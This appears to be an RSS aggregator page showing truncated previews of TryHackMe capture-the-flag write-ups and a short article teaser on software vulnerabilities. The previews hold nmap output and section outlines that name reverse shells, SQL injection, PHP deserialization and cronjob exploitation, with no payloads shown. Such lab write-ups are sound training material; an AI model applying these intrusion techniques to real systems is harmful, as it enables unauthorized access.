    Linux Machine CTF! You’ll learn about enumeration, finding hidden password files and how to exploit php deserialization! Contents 1 User flag 1.1 Open ports 1.2 Web enumeration 1.3 The index.php.bak file 1.4 PHP serialization exploit 1.5 James password 1.6 User flag 2 Root flag 2.1 Message from root 2.2 The motd service 2.3 Reverse shell and root flag User flag Open ports Nmap reveals 2 open ports: PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 44:ee:1e:ba:07:2a:54:69:ff:11:e3:49:d7:db:a9:01 (RSA) | 256 8b:2a:8f:d8:40:95:33:d5:fa:7a:40:6a:7f:29:e4:03 (ECDSA) |_ 256 65:59:e4:40:2a:c2:d7:05:77:b3:af:60:da:cd:fc:67 (ED25519) 80/tcp open http …
  • Open

    VMware Workspace One and Flexera Address Software Vulnerabilities
    Keeping ahead of software vulnerabilities is a tough task. No matter the organization, industry, location or experience, vulnerable applications pop up all over the place all the time. The SolarWinds breach in late 2020 or the ransomware attack that closed down the Colonial Pipeline supplying nearly half the gasoline to the East Coast are just a couple of recent major examples of the effects of a breach, but they’re just waiting to happen every day. Luckily for all of us in the information technology industry, there are plenty of amazing hackers and security experts on the side of stopping these…

  • Open

    TryHackMe > En-pass
    Get what you can’t. Think-out-of-the-box Contents 1 Name The Path. 1.1 Enumeration (1st level) 1.2 The zip directory 1.3 The web directory 2 What is the user flag? 2.1 SSH private key 2.2 The reg.php page 2.3 403 Fuzzing 2.4 SSH Connection 3 What is the root flag? 3.1 Cronjob 3.2 The script 3.3 Exploit 3.4 Root shell Name The Path. Nmap detects 2 open ports: PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 8a:bf:6b:1e:93:71:7c:99:04:59:d3:8d:81:04:af:46 (RSA) | 256 40:fd:0c:fc:0b:a8:f5:2d:b1:2e:34:81:e5:c7:a5:91 (ECDSA) |_ 256 7b:39:97:f0:6c:8a:ba:38:5f:48:7b:cc:da:72:a8:44 (ED25519) 8001/tcp open http Apache httpd 2.4.18 ((…

  • Open

    TryHackMe > Wekor
    CTF challenge involving Sqli , WordPress , vhost enumeration and recognizing internal services ;) Hey Everyone! This Box is just a little CTF I’ve prepared recently. I hope you enjoy it as it is my first time ever creating something like this ! This CTF is focused primarily on enumeration, better understanding of services and thinking out of the box for some parts of this machine. Feel free to ask any questions…It’s okay to be confused in some parts of the box ;) Just a quick note, Please use the domain wekor.thm as it could be useful later on in the box ;) Contents 1 User flag 1.1 Nmap scan 1.2 Robots.txt 1.3 SQL Injection 1.4 Wordpress credentials 1.5 Wordpress 1.6 Reverse Shell 1.7 Lateral move (www-data -> Orka) 1.8 User flag 2 Root flag 2.1 O…

  • Open

    TryHackMe > Bookstore
    A Beginner level box with basic web enumeration and REST API Fuzzing. Contents 1 User flag 1.1 Port 80 1.2 Port 5000 1.3 Fuzzing the API (v1) 1.4 User flag 2 Root flag 2.1 Console 2.2 Reverse Engineering (try-harder) 2.3 Root shell User flag Nmap discovers 3 open ports: PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 44:0e:60:ab:1e:86:5b:44:28:51:db:3f:9b:12:21:77 (RSA) | 256 59:2f:70:76:9f:65:ab:dc:0c:7d:c1:a2:a3:4d:e6:40 (ECDSA) |_ 256 10:9f:0b:dd:d6:4d:c7:7a:3d:ff:52:42:1d:29:6e:ba (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Book Store 5000/tcp open http Wer…
2022-08-17T02:24:45.203Z osmosfeed 1.15.1